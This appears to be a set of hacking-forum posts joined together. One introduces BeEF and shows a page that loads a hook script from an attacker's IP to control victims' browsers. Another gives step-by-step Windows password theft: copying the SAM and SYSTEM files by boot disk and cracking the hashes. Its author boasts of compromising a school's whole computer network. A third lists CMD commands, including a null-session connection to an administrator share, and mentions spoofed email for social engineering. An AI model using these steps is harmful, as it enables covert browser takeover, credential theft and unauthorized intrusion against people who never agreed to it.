What is BEeF?
When skids are asked what they use to hack Metasploit is the usual answer, mostly because they don't know any other way to do it. BEeF (I don't know what the lower-case e is for) stands for Browser Exploitation Framework is the equivelant to Metasploit for Browsers. In the land of Web-borne and mobile exploitation, BeEF focuses on one backdoor which is the web browser.
How is BeEF used for hacking?
Before being able to use BeEF's framework one must first "Hook" a browser, BeEF provides a hook URL that can be used. A popular way of Hooking a target is usually by putting the hook script into your webpage. After the target is "hooked" you can begin using the BeEF framework's many commands, including using metasploit.
The first thing you're going to have to do is CD to where BeEF is located, on Kali you can do this by inputing the code below:
I know it's a bit confusing but I'll elaborate, Hook UI is the interface where commands are sent and your list of zombies is viewed, we'll be looking into that in a bit. First we're going to talk about the hook URL which is what hooks the victim's browser. Below I'll put an example of some web code which should hopefully clarify how this hook URL is used.
<html> <head> <script src="http://192.168.2.100:3000/hook.js" type="text/java"></script> </head> </html>
The BeEF Interface:
Opening the BeEF UI URL will greet you with a browser interface and a log-in screen, the default username and password are both "beef". After logging in you'll be led to the interface where commands can be sent to hooked browsers.
One very important detail to look at is the traffic light system that BeEF uses to tell you what exploits work on the victim.
- Green means that you can use this exploit on the victim without him knowing.
- Orange means you can use an exploit but it may be visible to the target.
- Red means the exploit CANNOT be used against the target.
- Grey means the target hasn't been measured on this particular exploit.
That concludes our introduction to BeEF, I hope you learned something from this thread as I had a lot of fun making it. I don't usually contribute shit because I'm lazy but hopefully that will change.
HOW TO GET ANY WINDOWS PASSWORD #LearnHacking
ok..... here are the full details.....
this works on all windows till now ....
Programs needed: SAMInside (doesn't matter which version or if demo)
LC4 or LC5 (lophtcrack)( must be full version)
NTFSPro (doesn't matter if demo)
any bootdisk maker
this works even if syskey encryption is employed...
if it is FAT filesystem...
just copy the sam file to an empty floppy disk (or you can preffer PenDrive as well :p ) and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...
if it is NTFS....
u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.
use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....
AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 however, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.
I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.
If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windows pass.
Ever thought hacking can be so much easy on windows . here are few cool baisc tricks you can do on your windows machine using CMD
First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.
Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD (Command Prompt).
In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).
Back to commands:
In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.
Lets start easy...
1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.
ping x.x.x.x (x is the IP address)
ping http://www.whatever.com (http://www.whatever.com is the website you want to ping, but you don't know the IP)
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).
nslookup http://www.whatever.com (http://www.whatever.com is the website you want to find out the IP)
nslookup (enter) set type=mx (enter) yahoo.com
OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.c....&threadid=2360
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.
tracert x.x.x.x (x is the IP address)
tracert http://www.whatever.com (http://www.whatever.com is the website you don't know the IP)
4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.
5) route : This command will show you the routing table, gateway, interface and metric.
6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.
Also, in case you have a dynamic IP and want to change it, then type...
ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP)
7) netstat : This command will show you connection to your box.
netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above) net view x.x.x.x or computername (will list the available sharing folders on the target box)
Now some hints:
net use \ipaddressipc$ "" /user:administrator (this command will allow you to connect to the target box as administrator)
net use K: \computernameC$ (this will create a virtual drive on your "my computer" folder)
And least but not last, the "help" command.
This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.